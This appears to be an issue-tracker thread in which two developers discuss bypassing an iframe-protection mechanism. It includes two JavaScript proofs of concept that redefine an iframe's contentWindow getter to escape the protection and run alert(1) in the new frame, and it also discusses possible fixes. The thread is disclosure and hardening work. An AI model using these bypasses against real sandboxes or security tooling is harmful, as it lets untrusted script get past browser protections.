Bypass using by making contentWindow to throw an exception

[mmndaniel]

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        throw new Error('pwnd');
    }
});
try {
    document.body.appendChild(f);
} catch (e) {}
frames[0].alert(1);

This is what I mean here, but actually exploits the chromium bug workaround this time :)

[weizman]

Even worse, this contentWindow access can be trapped completely

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        window[0].alert(1)
    }
});
document.body.appendChild(f);

Which is a problem on one hand, but can't see a way around it atm...

[mmndaniel]

Can't you use the native getter?
var _get =Object.getOwnPropertyDescriptor(HTMLIFrameElement.prototype, 'contentWindow').get (same with embed, etc), I guess the question if it will make it appear in frames.

[weizman]

so after some research the chromium bug is different than i thought, but that's good news.
it doesn't require access specifically to contentWindow, but a broader and more abstract manipulation on the object.
luckily (for a reason i don't understand), running Object.getOwnPropertyDescriptor(frame, 'xxx') on it works too (which in contrast to the former method, this one cannot be trapped).